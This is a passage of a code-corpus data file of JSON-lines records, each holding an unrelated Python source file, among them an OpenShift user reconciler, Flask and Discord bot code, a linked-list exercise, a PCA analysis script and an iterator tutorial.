desired_state):\n    diff = []\n    users_to_del = subtract_states(current_state, desired_state, \"del_user\")\n    diff.extend(users_to_del)\n\n    return diff\n\n\ndef subtract_states(from_state, subtract_state, action):\n    result = []\n\n    for f_user in from_state:\n        found = False\n        for s_user in subtract_state:\n            if f_user != s_user:\n                continue\n            found = True\n            break\n        if not found:\n            result.append(\n                {\"action\": action, \"cluster\": f_user[\"cluster\"], \"user\": f_user[\"user\"]}\n            )\n\n    return result\n\n\ndef act(diff, oc_map):\n    cluster = diff[\"cluster\"]\n    user = diff[\"user\"]\n    action = diff[\"action\"]\n\n    if action == \"del_user\":\n        oc_map.get(cluster).delete_user(user)\n    else:\n        raise Exception(\"invalid action: {}\".format(action))\n\n\n@defer\ndef run(dry_run, thread_pool_size=10, internal=None, use_jump_host=True, defer=None):\n    oc_map, 
current_state = fetch_current_state(\n thread_pool_size, internal, use_jump_host\n )\n defer(oc_map.cleanup)\n desired_state = fetch_desired_state(oc_map)\n\n diffs = calculate_diff(current_state, desired_state)\n\n for diff in diffs:\n logging.info(list(diff.values()))\n\n if not dry_run:\n act(diff, oc_map)\n","sub_path":"reconcile/openshift_users.py","file_name":"openshift_users.py","file_ext":"py","file_size_in_byte":3882,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"478243490","text":"from bokeh.core.properties import Instance\nfrom bokeh.io import output_file, show\nfrom bokeh.core.properties import value\nfrom bokeh.models import ColumnDataSource, EditTool, Drag, Tap, CustomJS\nfrom bokeh.plotting import figure\nfrom bokeh.util.compiler import TypeScript\nfrom forest.barc import text_stamp\n\n#from bokeh.models.tools import FrontDrawTool\n\noutput_file('tool.html')\n\nclass FrontDrawTool(EditTool, Drag, Tap):\n __implementation__ = \"draw_tool.ts\"\n #source = Instance(ColumnDataSource)\n\nplot = figure(x_range=(0, 10), y_range=(0, 10))\n\n#plot.bezier(x0=[6.92,1.95], y0=[9.31,8.25], x1=[6.83,4.23], y1=[2.62,5.21], cx0=[2.17,3.15], cy0=[8.21,4.25], cx1=[1.73,2.47], cy1=[4.00,5.00])\n#source = ColumnDataSource(data=dict(xs=[6.92,1.95], ys=[9.31,8.25], x0=[6.92,1.95], y0=[9.31,8.25], x1=[6.83,4.23], y1=[2.62,5.21], cx0=[2.17,3.15], cy0=[8.21,4.25], cx1=[1.73,2.47], cy1=[4.00,5.00], angle=[None,None]))\n#source = ColumnDataSource(data=dict(xs=[None], ys=[None], x0=[None], y0=[None], x1=[None], y1=[None], cx0=[None], cy0=[None], cx1=[None], cy1=[None],angle=[None]))\nsource = ColumnDataSource(data=dict(xs=[], ys=[]))#, x0=[], y0=[], x1=[], y1=[], cx0=[], cy0=[], cx1=[], cy1=[],angle=[]))\nrenderers = [\n #order matters! 
Typescript assumes multiline, bézier, text_stamp\n    plot.multi_line(xs='xs',ys='ys', color=\"#aaaaaa\", line_width=1, source=source),\n    plot.bezier(x0='x0', y0='y0', x1='x1', y1='y1', cx0='cx0', cy0='cy0', cx1=\"cx1\", cy1=\"cy1\", source=ColumnDataSource(data=dict(x0=[], y0=[], x1=[], y1=[], cx0=[], cy0=[], cx1=[], cy1=[])), line_color=\"#d95f02\", line_width=2),\n    plot.text_stamp(x='x', y='y', angle='angle', color=\"red\", text=value('▲'), source=ColumnDataSource(data=dict(x=[], y=[], angle=[])))\n]\n\nsource.js_on_change('data',\n        CustomJS(args=dict(datasource =source), code=\"\"\"\n        console.log(datasource.data);\n        \"\"\"\n        ));\n\nplot.add_tools(FrontDrawTool(renderers=renderers))\nplot.title.text = \"Draw on the plot\"\n#plot.bezier(x0=[6.92,1.95], y0=[9.31,8.25], x1=[6.83,4.23], y1=[2.62,5.21], cx0=[2.17,3.15], cy0=[8.21,4.25], cx1=[1.73,2.47], cy1=[4.00,5.00])\n\nshow(plot)\n","sub_path":"forest/barc/draw_tool.py","file_name":"draw_tool.py","file_ext":"py","file_size_in_byte":2119,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
+{"seq_id":"643433963","text":"class Node: \n    def __init__(self, data):\n        self.data = data\n        self.next = None\n\nclass SLinkedList:\n    def __init__(self):\n        self.head = None\n\n    def printList(self): \n        temp = self.head \n        while (temp): \n            print (temp.data,end=\" \") \n            temp = temp.next\n    \n    def atBegining(self,newData):\n        newNode=Node(newData)\n        newNode.next = self.head\n        self.head = newNode\n\n    def atEnd(self, newdata):\n        newNode = Node(newdata)\n        if self.head is None:\n            self.head = newNode\n            return\n        last = self.head\n        while(last.next):\n            last = last.next\n        last.next=newNode\n\n    def InBetween(self,prevData,newdata):\n        if self.head.next is None:\n            print(\"The mentioned node is absent\")\n            return\n        temp = self.head\n        curPos=self.head\n        while (temp):\n            if(temp.data==prevData):\n                newNode = Node(newdata)\n                newNode.next = curPos.next\n                curPos.next=newNode\n            temp=temp.next\n            curPos=curPos.next\n        \n    def removeItem(self,removeData) :\n        temp=self.head\n        if(temp.data==removeData):\n            # removing the head: move the head pointer forward\n            self.head=temp.next\n            return\n        while(temp):\n            if(temp.data==removeData):\n                break\n            prev=temp\n            temp=temp.next\n        if(temp==None):\n            return\n        prev.next=temp.next\n        temp=None\n\n    def Inbetween(self,middle_node,newdata):\n        if middle_node is None:\n            print(\"The mentioned node is absent\")\n            return\n\n        NewNode = Node(newdata)\n        NewNode.next = middle_node.next.next\n        middle_node.next.next = NewNode\n\n    def printNthItem(self,num):\n        temp=self.head\n        item=0\n        while(temp != None):\n            temp=temp.next\n            item+=1\n            if(item==num):\n                print(\"\\nThe {}rd item from the list is {}\" .format(num, temp.data))\n\n    def printNthItemrev(self,num):\n        temp=self.head\n        cnt=0\n        while(temp != None):\n            temp=temp.next\n            cnt+=1\n        temp = self.head\n        for i in range(0,cnt-num):\n            temp=temp.next\n        print(temp.data)\n\n    def pairwiseSwap(self): \n        temp = self.head \n        # There are no nodes in linked list \n        if temp is None: \n            return \n        # Traverse further only if there are at least two \n        # left \n        while(temp is not None and temp.next is not None): \n            # Swap data of node with its next node's data \n            temp.data, temp.next.data = temp.next.data, temp.data \n            # Move temp by 2 for the next pair \n            temp = temp.next.next\n    \n    \nlist1 = SLinkedList()\nlist1.head = Node(\"Mon\")\ne2 = Node(\"Tue\")\ne3 = Node(\"Wed\")\ne4 = Node(\"Jan\")\n\n# Link first Node to second node\nlist1.head.next = e2\n\n# Link second Node to third node\ne2.next = e3\ne3.next = 
e4\n#list1.printList()\nlist1.atBegining(\"Sun\")\nprint(\"\\n\")\n#list1.printList()\nprint(\"\\n\")\nlist1.atEnd(\"Sat\")\n#list1.printList()\nprint(\"\\n\")\nlist1.printList()\nprint(\"\\n\")\nlist1.Inbetween(list1.head.next,\"Fri\")\nlist1.printList()\nprint(\"\\n\")\nlist1.InBetween(\"Wed\",\"Thurs\")\nlist1.printList()\nprint(\"\\n\")\nlist1.removeItem(\"Wed\")\nlist1.printList()\nlist1.printNthItem(3)\nprint(\"\\n\")\nlist1.printNthItemrev(5)\nlist1.printList()\nprint(\"\\n\")\nlist1.pairwiseSwap()\nlist1.printList()\n","sub_path":"List/ListOperation.py","file_name":"ListOperation.py","file_ext":"py","file_size_in_byte":3481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"223193224","text":"import shutil\n\nfrom diagnnose.extractors.base_extractor import Extractor\nfrom diagnnose.models.lm import LanguageModel\nfrom diagnnose.typedefs.activations import ActivationNames, RemoveCallback, SelectFunc\nfrom diagnnose.typedefs.corpus import Corpus\nfrom diagnnose.utils.misc import suppress_print\n\nBATCH_SIZE = 1024\n\n\n# @suppress_print\ndef simple_extract(\n model: LanguageModel,\n activations_dir: str,\n corpus: Corpus,\n activation_names: ActivationNames,\n selection_func: SelectFunc = lambda sen_id, pos, item: True,\n) -> RemoveCallback:\n \"\"\" Basic extraction method.\n\n Returns\n -------\n remove_activations : RemoveCallback\n callback function that can be executed at the end of a procedure\n that depends on the extracted activations. Removes all the\n activations that have been extracted. Takes no arguments.\n \"\"\"\n extractor = Extractor(model, corpus, activations_dir, activation_names)\n\n extractor.extract(\n batch_size=BATCH_SIZE, dynamic_dumping=True, selection_func=selection_func\n )\n\n def remove_activations():\n shutil.rmtree(activations_dir)\n\n return remove_activations\n","sub_path":"diagnnose/extractors/simple_extract.py","file_name":"simple_extract.py","file_ext":"py","file_size_in_byte":1157,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"159501634","text":"from pathlib import Path\n\nimport aiohttp\nimport discord\n\nfrom config import DiscordAPI\nfrom discord.ext import commands\n\n\nbot_prefix = commands.when_mentioned_or('Casper ', 'casper ')\nbot_description = \"\"\"Casper is a discord bot with a focus on character data\n aggregation for Blizzard Entertainment's World of Warcraft. \n It also has a variety of joke commands and fitness-related\n commands.\"\"\"\n\n\nclass CasperBot(commands.Bot):\n def __init__(self, *args, **kwargs):\n super().__init__(command_prefix=bot_prefix,\n description=bot_description,\n owner_id=DiscordAPI.OWNERID,\n *args, **kwargs)\n\n self.aiohttp_connector = aiohttp.TCPConnector(\n limit=2,\n force_close=True,\n enable_cleanup_closed=True\n )\n self.aiohttp_session = aiohttp.ClientSession(connector=self.aiohttp_connector)\n\n self.temp_shut_down = False\n\n @staticmethod\n async def on_ready():\n print('=============================================================\\n'\n 'Bot started. 
Loading cogs...')\n cogs_path = Path(__file__).parent / 'cogs'\n for sub_dir in cogs_path.iterdir():\n for cog in sub_dir.iterdir():\n if 'commands' in cog.name:\n try:\n casper_bot.load_extension(\n f'cogs.{sub_dir.name}.{cog.name.replace(\".py\", \"\")}')\n print(f'Loaded: cogs.{sub_dir.name}.{cog.name.replace(\".py\", \"\")}')\n except discord.ext.commands.errors.ExtensionAlreadyLoaded as e:\n print(f'Extension already loaded: {cog.name}')\n print('Finished loading all cogs.\\n'\n '=============================================================')\n\n @staticmethod\n async def on_command(ctx):\n \"\"\"\n This trigger is just for better error logging and troubleshooting.\n :param ctx:\n :return:\n \"\"\"\n print(f'=============================================================\\n'\n f'Command used:\\n'\n f'User: {ctx.author.name}\\n'\n f'Server: {ctx.guild}\\n'\n f'Channel: {ctx.message.channel}\\n'\n f'Command: {ctx.message.content}\\n'\n f'=============================================================')\n return\n\n\ncasper_bot = CasperBot()\n\n\n@casper_bot.event\nasync def on_message(message):\n if casper_bot.temp_shut_down and message.author.id != casper_bot.owner_id:\n return\n await casper_bot.process_commands(message)\n\n\n@casper_bot.command(hidden=True)\nasync def leave(ctx):\n if ctx.author.id == DiscordAPI.OWNERID:\n await ctx.guild.leave()\n print(f'Left guild: {ctx.guild.name}')\n\n\n@casper_bot.command(hidden=True)\nasync def where(ctx):\n if ctx.author.id == DiscordAPI.OWNERID:\n output = 'I\\'m currently in the following discord servers:\\n\\n'\n for guild in casper_bot.guilds:\n output += f'{guild.name}\\n'\n return await ctx.send(output)\n\n\n@casper_bot.command(hidden=True)\nasync def thanks(ctx):\n return await ctx.send('You\\'re welcome.')\n\n\n@casper_bot.command(hidden=True)\nasync def te(ctx):\n ...\n\n\n@casper_bot.command(hidden=True)\nasync def shutdown(ctx):\n if ctx.author.id == casper_bot.owner_id:\n casper_bot.temp_shut_down = True\n return await ctx.send('Shutting down.')\n else:\n return await ctx.send('No.')\n\n\n@casper_bot.command(hidden=True)\nasync def comeback(ctx):\n if ctx.author.id == casper_bot.owner_id:\n casper_bot.temp_shut_down = False\n return await ctx.send('I\\'m here.')\n else:\n return await ctx.send('No.')\n\n\nif __name__ == '__main__':\n casper_bot.run(DiscordAPI.TOKEN)\n","sub_path":"casper.py","file_name":"casper.py","file_ext":"py","file_size_in_byte":3861,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"82606659","text":"from flask import Blueprint, redirect, render_template, request, jsonify, send_from_directory, flash, url_for, json\nfrom flask_login import current_user, login_required\njobs_views = Blueprint('jobs_views', __name__, template_folder='../templates')\nfrom App.controllers import(get_jobs_json, get_jobs)\nfrom App.models import db, Jobs\nimport uuid\n\n\n#<----------------Render Admin Jobs Page and parses jobs------------->\n\n@jobs_views.route('/jobs_admin', methods=['GET'])\n@login_required\ndef coursesAdmin():\n jobs = get_jobs()\n return render_template('jobs_admin.html', jobs=jobs)\n\n#<----------Fixes Serialization Format------------------------------------->\n\ndef encoder_jobs(job):\n if isinstance(job, Jobs):\n return {'jobName':job.jobName, 'jobDescription': job.jobDescription, 'requirements':job.requirements\n }\n raise TypeError(f'Object{job} is not of type Jobs')\n\n#<---------------------------Insert Course Into 
Database------------->\n\n@jobs_views.route('/insertJob', methods=['POST'])\n@login_required\ndef insertJob():\n    jobname = request.form.get('jobname') \n    jobdescription = request.form.get('jobdescription') \n    requirements = request.form.get('requirements')\n    \n    #<----Data validation----->\n    \n    if (len(jobname) == 0 or len(jobname)>100 or not jobname.strip() or jobname.isdigit()):\n        return \"\"\n    if (len(jobdescription) == 0 or len(jobdescription) > 1000 or jobdescription.isdigit() or not jobdescription.strip()):\n        return \"\"\n    if (len(requirements) == 0 or len(requirements) >100 or requirements.isdigit() or not requirements.strip()):\n        return \"\" \n    else:\n        newjob = Jobs(jobName=jobname, jobID=uuid.uuid4().int & 0xfffff, jobDescription=jobdescription, requirements=requirements) # create job object\n        db.session.add(newjob)  # save new job\n        db.session.commit()\n        return json.dumps(newjob.toDict())\n    \n#<-------------------Delete Course----------------------->\n\n@jobs_views.route('/deleteJob/<jobID>', methods=['GET'])\n@login_required\ndef delete_job(jobID):\n\n    job = Jobs.query.get(jobID)# query course\n    if job:\n        db.session.delete(job)\n        db.session.commit()\n        return jobID\n    return 'Unauthorized or job not found' ","sub_path":"App/views/jobs.py","file_name":"jobs.py","file_ext":"py","file_size_in_byte":2258,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"}
+{"seq_id":"542288499","text":"from tkinter import *\r\nfrom tkinter import messagebox\r\ndef clickButton():\r\n    messagebox.showinfo(\"요기제목\", \"요기내용\")\r\n\r\nwindow = Tk() #root = Tk()\r\n\r\nlabel1 = Label(window, text=\"파이썬 공부중~~\")\r\nlabel2 = Label(window, text=\"파이썬 공부중~~\", font=(\"궁서체\", 30), fg=\"blue\")\r\nlabel3 = Label(window, text=\"파이썬 \", bg= \"red\", width=20, height=5, anchor=SE)\r\n## anchor places the label at SE (South East)!!\r\n\r\nphoto = PhotoImage(file = \"C:/images/Pet_GIF/Pet_GIF(256x256)/etc15_256.gif\")\r\n## prepare the picture\r\nlabel4 = Label(window, image = photo)\r\n## and display it on a label.\r\nbutton1 = Button(window, text=\"나를 눌러줘\", command = clickButton)\r\n## clickButton is a callback function, so it must not be written as clickButton() here. (see python - 2019-06-11 typora notes)\r\nbutton2 = Button(window, image=photo, command = clickButton)\r\n\r\n\r\n\r\nlabel1.pack(); label2.pack();label3.pack();label4.pack(side = LEFT);button1.pack();button2.pack()\r\n## side is passed to pack.\r\nwindow.mainloop()\r\n","sub_path":"강의자료/2019-06-11/Code05-01 GUI 02.py","file_name":"Code05-01 GUI 02.py","file_ext":"py","file_size_in_byte":1029,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"}
+{"seq_id":"366053939","text":"# ********************************\r\n# module 4-Lab2\r\nimport math\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib\r\nfrom sklearn import preprocessing\r\nfrom sklearn.decomposition import PCA\r\nimport pandas as pd\r\npd.set_option('display.width', 300)\r\nplt.style.use('ggplot')\r\n\r\n\r\ndef scaleFeaturesDF(df):\r\n    # Feature scaling is a type of transformation that only changes the\r\n    # scale, but not the number of features. Because of this, we can still\r\n    # use the original dataset's column names... 
so long as we keep in\r\n    # mind that the _units_ have been altered:\r\n\r\n    scaled = preprocessing.StandardScaler().fit_transform(df)\r\n    scaled = pd.DataFrame(scaled, columns=df.columns)\r\n\r\n    print(\"New Variances:\\n\", scaled.var())\r\n    print(\"New Describe:\\n\", scaled.describe())\r\n    return scaled\r\n\r\n\r\ndef drawVectors(transformed_features, components_, columns, plt, scaled):\r\n    if not scaled:\r\n        return plt.axes() # No cheating ;-)\r\n\r\n    num_columns = len(columns)\r\n\r\n    # This function will project your *original* feature (columns)\r\n    # onto your principal component feature-space, so that you can\r\n    # visualize how \"important\" each one was in the\r\n    # multi-dimensional scaling\r\n\r\n    # Scale the principal components by the max value in\r\n    # the transformed set belonging to that component\r\n    xvector = components_[0] * max(transformed_features[:,0])\r\n    yvector = components_[1] * max(transformed_features[:,1])\r\n\r\n    ## visualize projections\r\n\r\n    # Sort each column by its length. These are your *original*\r\n    # columns, not the principal components.\r\n    important_features = { columns[i] : math.sqrt(xvector[i]**2 + yvector[i]**2) for i in range(num_columns) }\r\n    important_features = sorted(zip(important_features.values(), important_features.keys()), reverse=True)\r\n    print(\"Features by importance:\\n\", important_features)\r\n\r\n    ax = plt.axes()\r\n\r\n    for i in range(num_columns):\r\n        # Use an arrow to project each original feature as a\r\n        # labeled vector on your principal component axes\r\n        plt.arrow(0, 0, xvector[i], yvector[i], color='b', width=0.0005, head_width=0.02, alpha=0.75)\r\n        plt.text(xvector[i]*1.2, yvector[i]*1.2, list(columns)[i], color='b', alpha=0.75)\r\n\r\n    return ax\r\n\r\n\r\n# Do * NOT * alter this line, until instructed!\r\n#scaleFeatures = False\r\nscaleFeatures = True\r\n\r\nfname = 'C:/Users/zkrunic/Documents/BigData/ML/Python/edx/'+ \\\r\n        'ProgrammingwithPythonforDataScienceDAT210x/'+ \\\r\n        'DAT210x-master/Module4/Datasets/kidney_disease.csv'\r\ndf = pd.read_csv(fname, index_col=0)\r\n\r\n#df = df.drop(['wheat_type'], 1)\r\n#\r\n# We use the following representation to collect the dataset\r\n# age - age\r\n# \tbp - blood pressure\r\n# \tsg - specific gravity\r\n# \tal - albumin\r\n# \tsu - sugar\r\n# \trbc - red blood cells\r\n# \tpc - pus cell\r\n# \tpcc - pus cell clumps\r\n# \tba - bacteria\r\n# \t*** bgr - blood glucose random ********************\r\n# 10. Blood Glucose Random(numerical)\r\n# bgr in mgs/dl\r\n#\r\n# \tbu - blood urea\r\n# \tsc - serum creatinine\r\n# \tsod - sodium\r\n# \tpot - potassium\r\n# \themo - hemoglobin\r\n# \tpcv - packed cell volume\r\n# \t**** wc - white blood cell count ********************\r\n# 17. White Blood Cell Count(numerical)\r\n# \t wc in cells/cumm\r\n# \t**** rc - red blood cell count ********************\r\n# 18. 
Red Blood Cell Count(numerical)\r\n# \t rc in millions/cmm\r\n# \thtn - hypertension\r\n# \tdm - diabetes mellitus\r\n# \tcad - coronary artery disease\r\n# \tappet - appetite\r\n# \tpe - pedal edema\r\n# \tane - anemia\r\n# \tclass - class\r\n#\r\n\r\n\r\n\r\ndf = df.dropna(axis=0)\r\ndf.reset_index()\r\ndf.isnull().sum()\r\ndf.dtypes\r\ndf.describe()\r\ndf.pcv = df.pcv.astype(int)\r\ndf.wc = df.wc.astype(int)\r\ndf.rc = df.rc.astype(float)\r\nlabels = ['red' if i=='ckd' else 'green' for i in df.classification]\r\ndf.drop(['classification', 'rbc', 'pc', 'pcc', 'ba'\r\n , 'htn', 'dm', 'cad', 'appet', 'pe', 'ane'], 1, inplace=True)\r\n\r\ndf3 = df\r\ndf3.isnull().sum()\r\n\r\ndf3.describe()\r\ndf3.var().sort_values(ascending=False)\r\n\r\nif scaleFeatures: df3 = scaleFeaturesDF(df3)\r\n\r\npca = PCA(n_components=2, svd_solver='full')\r\npca.fit(df3)\r\nPCA(copy=True, n_components=2, whiten=False)\r\nT = pca.transform(df3)\r\ndf3.shape\r\n(430, 6) # 430 Student survey responses, 6 questions..\r\nT.shape\r\n(430, 2) # 430 Student survey responses, 2 principal components..\r\n\r\n# Since we transformed via PCA, we no longer have column names; but we know we\r\n# are in `principal-component` space, so we'll just define the coordinates accordingly:\r\nax = drawVectors(T, pca.components_, df3.columns.values, plt, scaleFeatures)\r\nT = pd.DataFrame(T)\r\n\r\nT.columns = ['component1', 'component2']\r\nT.plot.scatter(x='component1', y='component2', marker='o', c=labels, alpha=0.75, ax=ax)\r\n\r\nplt.show()\r\n\r\n\r\n","sub_path":"mod4Lab3.py","file_name":"mod4Lab3.py","file_ext":"py","file_size_in_byte":4922,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"411484704","text":"list1=[]\nfor i in range(9):\n list1.append( int(input()) )\n\nmaxNum = max(list1)\nmaxIndex = list1.index( maxNum )\nprint(\"Index of the largest number {:d} is: ({:d}, {:d})\".format(maxNum, maxIndex//3, maxIndex%3 ))\nminNum = min(list1)\nminIndex = list1.index( minNum )\nprint(\"Index of the smallest number {:d} is: ({:d}, {:d})\".format(minNum, minIndex//3, minIndex%3))\n","sub_path":"重複練習/t608.py","file_name":"t608.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"493235385","text":"import os\nfrom flask_restful import Resource, marshal\nfrom flask_restful import request\nfrom api.models.auth.user_address import UserAddress\nfrom api.schemas.users import users_address_schema, users_address_schema2\nfrom api.validators.signup import SignupAddress\nfrom api.validators.signup2 import SignupAddress as SignupAddress2\nfrom api.common.decorators import jwt_required, log\nfrom api.validators.signup_constants import convert_str_to_bool\n\nclass UserAddresses(Resource):\n\n @jwt_required\n @log('Endereço criado com sucesso!')\n def post(self):\n try:\n user_id = request.user.id\n request_json = request.json\n form_version = int(os.environ.get('FORM_VERSION', 1))\n if form_version == 1:\n validator = SignupAddress(**request_json)\n elif form_version == 2:\n validator = SignupAddress2(**request_json)\n else:\n validator = SignupAddress(**request_json)\n\n if validator.validate_on_submit():\n request_json[\"user_id\"] = user_id\n if form_version == 2:\n request_json['correspondence'] = convert_str_to_bool(request_json, 'correspondence')\n request_json['check_business_address'] = convert_str_to_bool(request_json, 'check_business_address')\n user_address = 
UserAddress(**request_json)\n user_address.save()\n schema = users_address_schema if form_version == 1 else users_address_schema2\n return marshal(user_address, schema), 201\n return validator.errors, 500\n except Exception as e:\n return {'message': str(e)}, 500\n\n @jwt_required\n def get(self):\n try:\n user_id = request.user.id\n addresses = UserAddress.query.filter_by(user_id=user_id).all()\n form_version = int(os.environ.get('FORM_VERSION', 1))\n schema = users_address_schema if form_version == 1 else users_address_schema2\n if addresses:\n response = []\n for address in addresses:\n response.append(marshal(address, schema))\n return response, 200\n\n return {'message': 'Not Found'}, 404\n except Exception as e:\n print(e)\n return {'message': str(e)}, 500\n","sub_path":"Allgoo/api-andbank/api/resources/user_addresses.py","file_name":"user_addresses.py","file_ext":"py","file_size_in_byte":2367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"348150834","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n#ke @ 2016\n\nfrom FeatureInfo import runFeatureInfo\nfrom AppInfo import runApkInfo\nfrom TrainAndPredict import runTrainAndPredict\nfrom GetMLPara import runML\nimport Global\nimport argparse\nimport sys\n\n\ndef parse_options():\n parser = argparse.ArgumentParser(description=\"running analysis...\", prefix_chars='-+/')\n\n parser.add_argument('-w', action=\"store_false\", default=None,\n help='Turn whole-program-analysis off, use regions for classification')\n parser.add_argument('+w', action=\"store_true\", default=None,\n help='Turn whole-program-analysis on, ignore code structure')\n\n parser.add_argument('-a', '--apkinfo', action='store_true',default=False, help='get Application information')\n parser.add_argument('-f', '--feainfo', action='store_true',default=False, help='get Feature information' )\n parser.add_argument('-m', '--mlparameters', action='store_true',default=False,\n help='show how we choose a machine learning algorithm based on ROC and precision-recall curves.' 
)\n\n    parser.add_argument('-p', '--predict', type=str, help='predict a tested apk: 1-malicious 0-benign [0-1]: malicious score' )\n    args = parser.parse_args()\n\n    return args\n\n\nif __name__ == \"__main__\":\n\n\n    input_file =\"apks/com.andromo.dev4168.app4242.apk\"\n    args = parse_options()\n\n    print (args)\n\n    if args.w :\n        Global.WHOLE_PROGRAM_ANALYSIS = True\n    else:\n        Global.WHOLE_PROGRAM_ANALYSIS = False\n\n\n    if args.mlparameters:\n        runML()\n\n\n    input_file = args.predict\n\n    if input_file == None:\n        print (\"No apk input, system exit\")\n        sys.exit(0)\n\n    if args.apkinfo:\n        runApkInfo(input_file)\n    if args.feainfo:\n        runFeatureInfo(input_file)\n\n\n    runTrainAndPredict(input_file)","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"}
+{"seq_id":"61279350","text":"import json\nfrom nltk.tokenize import RegexpTokenizer\n\nmoney1 = [\"week\", \"ramen\", \"paycheck\", \"work\", \"couple\", \"rice\",\n\"check\", \"pizza\", \"grocery\",\"rent\", \"anyone\", \"favor\",\n\"someone\",\"bill\",\"money\"]\n\t\nmoney2 = [\"food\", \"money\", \"house\", \"bill\", \"rent\", \"stamp\", \"month\",\n\"today\", \"parent\", \"help\", \"pizza\", \"someone\", \"anything\",\n\"mom\", \"anyone\"]\n\njob = [\"job\", \"month\", \"rent\", \"year\", \"interview\", \"bill\", \"luck\",\n\"school\", \"pizza\", \"paycheck\", \"unemployment\",\n\"money\", \"ramen\", \"end\", \"check\"]\n\nfamily = [\"tonight\", \"night\", \"today\", \"tomorrow\", \"someone\",\n\"anyone\", \"friday\", \"dinner\", \"something\", \"account\",\n\"family\", \"bank\", \"anything\", \"home\", \"work\"] #also includes time\n\ninstanceCounts = {\"countMoney1\": 0,\"countMoney2\": 0,\"countJob\": 0,\"countFamily\": 0}\n\njsonFile=open(\"C:\\\\Users\\\\Tom\\\\Downloads\\\\train.json\\\\train.json\").read()\ntrainData = json.loads(jsonFile)\n\ntokenizer = RegexpTokenizer('[A-Za-z]+') \n\nfor record in trainData:\n    instanceCounts[\"countMoney1\"] = 0\n    instanceCounts[\"countMoney2\"] = 0\n    instanceCounts[\"countJob\"] = 0\n    instanceCounts[\"countFamily\"] = 0\n    recordContents = record['request_text_edit_aware']\n    recordContents = tokenizer.tokenize(recordContents)\n    for line in recordContents:\n        if line in money1:\n            instanceCounts[\"countMoney1\"] += 1\n        if line in money2:\n            instanceCounts[\"countMoney2\"] += 1\n        if line in job:\n            instanceCounts[\"countJob\"] += 1\n        if line in family:\n            instanceCounts[\"countFamily\"] += 1\n    record.update(instanceCounts)\n\noutFile = open(\"trainOutput.json\",\"w\")\njson.dump(trainData,outFile,sort_keys = True, indent = 4)\noutFile.close()\n \n","sub_path":"raop/featureextract/features-narratives.py","file_name":"features-narratives.py","file_ext":"py","file_size_in_byte":1683,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
+{"seq_id":"102715897","text":"# -*- coding: latin-1 -*-\nnamelist = ['famid', 'seq', 'nom', 'prenom', 'no', 'rue', 'app',\n            'ville', 'prov', 'residence', 'bureau', 'postal', 'naissance',\n            'age', 'sexe', 'courriel', 'carte', 'telephone', 'expiration',\n            'reponse', 'actc', 'activite', 'remarque', 'am']\nexcelout = ['prenom', 'nom']\nnumlist = [0, 2, 4, 8, 10, 11, 12, 13, 14, 16, 18, 20, 21, 23,\n           24, 26, 28, 30, 31, 33, 35, 36, 37, 39]\ncolpage1 = ['Nom', 'Adresse', 'Sexe', 'Age', 'Lun', 'Mar',\n            'Mer', 'Jeu', 'Ven', 'Quitte seul/vfi']\ncolpage2 = ['Nom', 'Telephone', 'Appel parent', 'Maladie, allergie, medicaments, 
etc']\nmastervar = ['Famid', 'Nom', 'Telephone', 'Travail', 'Adresse', 'Naissance', 'S', 'Grp']\nliste = 'newlist.xls'\naddmemb = 'addlist.xls'\noutxlsfile = 'listegrp.xls'\nspecChars = {'-': ' ', 'É': 'E', 'À': 'A', 'È': 'E', 'Ù': 'U', 'Û': 'U',\n 'Ô': 'O', 'Î': 'I', 'Ê': 'E', 'Â': 'A', 'Ï': 'I', 'Ë': 'E',\n 'Ç': 'C', 'Á': 'A', 'Ê': 'E', 'Ó': 'O'}\n","sub_path":"var.py","file_name":"var.py","file_ext":"py","file_size_in_byte":1020,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"508869057","text":"# iteradores (iterators)\n# é um objeto que contém um conjunto de valores\n# podemos percorer os valores desse objeto\n# lista = [num for num in range(10)]\n# [num for num in lista]\n\n# # iterator is iterable\n# numeros = [num for num in range(1, 4)]\n# it = iter(numeros)\n# print(next(it)) # 1\n# print(next(it)) # 2\n# print(next(it)) # 3\n#\n# # string também são iteraveis\n# palavra = 'Erickson'\n# it = iter(palavra)\n# print(next(it)) # E\n# print(next(it)) # r\n# print(next(it)) # i\n\n\n# # criar um iterator\n# class numeros:\n# # se a função for iter ele armazena o valor\n# def __iter__(self):\n# self.a = 0\n# return self\n#\n# # se a função for next ele adiciona 2 ao valor de a, que nesse caso foi passado 0\n# def __next__(self):\n# self.a += 2\n# return self.a\n#\n#\n# n = numeros()\n# it = iter(n)\n# print(next(it))\n# print(next(it))\n# print(next(it))\n# print(next(it))\n# print(next(it))\n\n\n# Stop interation\nclass numeros:\n def __iter__(self):\n self.numero = 0\n return self\n\n def __next__(self):\n if self.numero < 10: # Se o numero que começa em 0 for menor que 0, executa..\n self.numero += 1\n return self.numero\n else: # caso contrario para o código\n raise StopIteration\n\n\nnum = numeros()\nit = iter(num)\n\nfor numero in it:\n print(numero)\n\n","sub_path":"Cursos Python/Python 3 - João ribeiro/(Parte - 4) iteráveis com classes.py","file_name":"(Parte - 4) iteráveis com classes.py","file_ext":"py","file_size_in_byte":1365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} 